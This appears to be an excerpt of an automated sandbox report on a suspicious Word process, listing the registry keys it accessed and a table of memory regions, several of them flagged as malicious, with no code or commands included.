Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\74F68
74F68
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\74F68
74F68
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
There are 475 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2910000
unkown
page read and write
malicious
401000
unkown
page execute read
malicious
27F0000
heap
page read and write
malicious
401000
unkown
page execute read
malicious
3BB0000
unkown
page read and write
malicious
3B14000
unkown
page read and write
malicious
401000
unkown
page execute read
malicious
27D0000
heap
page read and write
malicious
401000
unkown
page execute read
malicious
2C50000
heap
page read and write
malicious
7FD30000
direct allocation
page read and write
malicious
3E0D000
unkown
page read and write
malicious
401000
unkown
page execute read
malicious
7FDC0000
direct allocation
page read and write
malicious
20565A00000
heap
page read and write
9BD0000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
348C000
stack
page read and write
99B0000
trusted library allocation
page read and write
20564F80000
heap
page read and write
97B0000
unkown
page read and write
9BD0000
trusted library allocation
page read and write
39B0000
unkown
page read and write
49BC000
stack
page read and write
A5D0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
575000
heap
page read and write
87A0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
2B2E000
stack
page read and write
990000
heap
page read and write
286C000
heap
page read and write
1AFA6462000
heap
page read and write
8740000
trusted library allocation
page read and write
6BA0000
direct allocation
page read and write
88D5000
trusted library allocation
page read and write
6CD2AFB000
stack
page read and write
9BD0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
4CDE000
heap
page read and write
9BD0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
4B90000
remote allocation
page read and write
95F0000
trusted library allocation
page read and write
63B267F000
stack
page read and write
9740000
trusted library allocation
page read and write
4D28000
heap
page read and write
99F0000
trusted library allocation
page read and write
8750000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9CF0000
trusted library section
page read and write
174FA260000
heap
page read and write
95E0000
trusted library allocation
page read and write
2056A8AC000
heap
page read and write
1AFA6330000
heap
page read and write
82B3000
trusted library allocation
page read and write
27B5DE48000
heap
page read and write
97C0000
trusted library allocation
page read and write
6514000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
543E000
stack
page read and write
99C0000
trusted library allocation
page read and write
52E0000
direct allocation
page read and write
87A0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9C40000
trusted library allocation
page read and write
2CC0000
heap
page read and write
CA2D9FF000
stack
page read and write
5E89000
trusted library allocation
page read and write
890000
heap
page read and write
94F000
stack
page read and write
9A41000
trusted library allocation
page read and write
BB30000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
20564FF0000
heap
page read and write
187C7308000
heap
page read and write
76F0000
trusted library allocation
page read and write
3641000
heap
page read and write
BD45000
trusted library allocation
page read and write
5D54000
trusted library allocation
page read and write
989E000
stack
page read and write
9827000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
5F04000
trusted library allocation
page read and write
9A6E000
trusted library allocation
page read and write
800E000
stack
page read and write
87A5000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
5DD8000
trusted library allocation
page read and write
5330000
heap
page read and write
5A18000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
65A000
heap
page read and write
98E0000
trusted library allocation
page execute and read and write
8370000
trusted library allocation
page read and write
1AFA6508000
heap
page read and write
97C0000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9715000
trusted library allocation
page read and write
E45FCFE000
stack
page read and write
BAB3000
trusted library allocation
page read and write
174FA427000
heap
page read and write
9820000
trusted library allocation
page read and write
21390BF0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
5210000
direct allocation
page read and write
9D00000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
2D3AB47E000
heap
page read and write
9740000
trusted library allocation
page read and write
9A80000
trusted library allocation
page read and write
493000
unkown
page readonly
9950000
trusted library allocation
page read and write
9C10000
trusted library allocation
page execute and read and write
364A000
heap
page read and write
98B0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
A5E7000
trusted library allocation
page read and write
21390BC0000
trusted library allocation
page read and write
8740000
trusted library allocation
page read and write
2056A7C0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
6BE0000
direct allocation
page read and write
7F130000
trusted library allocation
page execute and read and write
205665E3000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
87A5000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
2F80000
heap
page read and write
53F6000
heap
page read and write
187C726F000
heap
page read and write
87A0000
unkown
page read and write
A5D0000
trusted library allocation
page read and write
99F9000
trusted library allocation
page read and write
2D3AB200000
heap
page read and write
82FB000
trusted library allocation
page read and write
1AFA6460000
heap
page read and write
174FA450000
heap
page read and write
9740000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
2056A812000
heap
page read and write
8870000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
5B05000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9C20000
trusted library allocation
page read and write
4000000
unkown
page read and write
2D3AB413000
heap
page read and write
9630000
unkown
page read and write
87A0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
314E000
unkown
page read and write
223A2C02000
trusted library allocation
page read and write
BBD5000
trusted library allocation
page read and write
98DF000
trusted library allocation
page read and write
4850000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
4270000
heap
page read and write
75E0000
trusted library allocation
page read and write
3640000
heap
page read and write
9BE0000
trusted library allocation
page read and write
48E000
unkown
page write copy
B406000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
BCD4000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
400000
unkown
page readonly
6BB1000
direct allocation
page read and write
88C0000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
8720000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
87A0000
unkown
page read and write
9710000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
9635000
unkown
page read and write
88D0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
A7BE000
stack
page read and write
9470000
trusted library allocation
page read and write
187C7252000
heap
page read and write
2B6E000
stack
page read and write
9650000
unkown
page read and write
88AC000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
2D3AB45B000
heap
page read and write
64BD000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
86DC000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9820000
unkown
page read and write
7740000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
20565B18000
heap
page read and write
2056A840000
heap
page read and write
629B39C000
stack
page read and write
20565092000
heap
page read and write
95F0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
814F000
stack
page read and write
88C0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9D10000
trusted library allocation
page read and write
3FD3000
unkown
page read and write
88A0000
trusted library allocation
page read and write
2848000
direct allocation
page read and write
86CF000
trusted library allocation
page read and write
2056AAB0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
629B979000
stack
page read and write
174FA413000
heap
page read and write
2056A8F1000
heap
page read and write
9780000
trusted library allocation
page read and write
2F87000
heap
page read and write
27B5DE02000
heap
page read and write
9810000
trusted library allocation
page read and write
386E000
unkown
page read and write
9740000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
7650000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
5A92000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
BE40000
trusted library allocation
page read and write
4D4E000
heap
page read and write
4E7F000
stack
page read and write
B6B0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
521F000
stack
page read and write
88A0000
trusted library allocation
page read and write
7730000
trusted library allocation
page execute and read and write
7FCA0000
unkown
page read and write
9815000
trusted library allocation
page read and write
97C7000
trusted library allocation
page read and write
174FA270000
heap
page read and write
8710000
trusted library allocation
page read and write
439F000
stack
page read and write
77F0000
trusted library allocation
page read and write
51F6000
direct allocation
page read and write
A39000
stack
page read and write
20565B00000
heap
page read and write
187C7300000
heap
page read and write
8840000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9630000
unkown
page read and write
9710000
trusted library allocation
page read and write
4BC0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
7706000
trusted library allocation
page read and write
87A5000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
176C97C000
stack
page read and write
8830000
trusted library allocation
page read and write
CA2DAFF000
stack
page read and write
95C0000
trusted library allocation
page read and write
23C7000
heap
page read and write
187C724D000
heap
page read and write
8850000
trusted library allocation
page read and write
9940000
unkown
page read and write
9810000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
6F8000
heap
page read and write
9645000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
9CAE000
stack
page read and write
9930000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9730000
unkown
page read and write
74C0000
trusted library allocation
page read and write
52C6000
direct allocation
page read and write
9B40000
trusted library allocation
page read and write
7F770000
unkown
page read and write
9475000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
174FA400000
heap
page read and write
99B0000
unkown
page read and write
95E0000
trusted library allocation
page read and write
BCBA000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9950000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
4477000
heap
page read and write
BDCD000
trusted library allocation
page read and write
9C20000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9B30000
unkown
page read and write
9940000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9C37000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
223A2500000
heap
page read and write
95F0000
trusted library allocation
page read and write
7650000
trusted library allocation
page read and write
80CB000
stack
page read and write
9785000
unkown
page read and write
9865000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
269C000
stack
page read and write
9B50000
trusted library allocation
page read and write
9730000
trusted library allocation
page execute and read and write
9630000
trusted library allocation
page read and write
2056A822000
heap
page read and write
88A0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
A5D1000
trusted library allocation
page read and write
9634000
trusted library allocation
page read and write
1AFA6400000
heap
page read and write
9650000
trusted library allocation
page read and write
834E000
trusted library allocation
page read and write
9640000
unkown
page read and write
9910000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
4643000
trusted library allocation
page read and write
1AFA643C000
heap
page read and write
4D2D000
heap
page read and write
A670000
trusted library allocation
page execute and read and write
1AFA6E02000
trusted library allocation
page read and write
4656000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
8710000
trusted library allocation
page read and write
4DA5000
heap
page read and write
9A20000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
27B5DE3E000
heap
page read and write
99F5000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
493000
unkown
page readonly
9815000
trusted library allocation
page read and write
2056A680000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
493000
unkown
page readonly
9BD0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
99D9000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
2F5D000
stack
page read and write
4B90000
remote allocation
page read and write
88D0000
trusted library allocation
page read and write
74C0000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
9B70000
trusted library allocation
page read and write
9475000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
8780000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
2056AAF0000
remote allocation
page read and write
3FCC000
unkown
page read and write
7800000
trusted library allocation
page read and write
9A00000
trusted library allocation
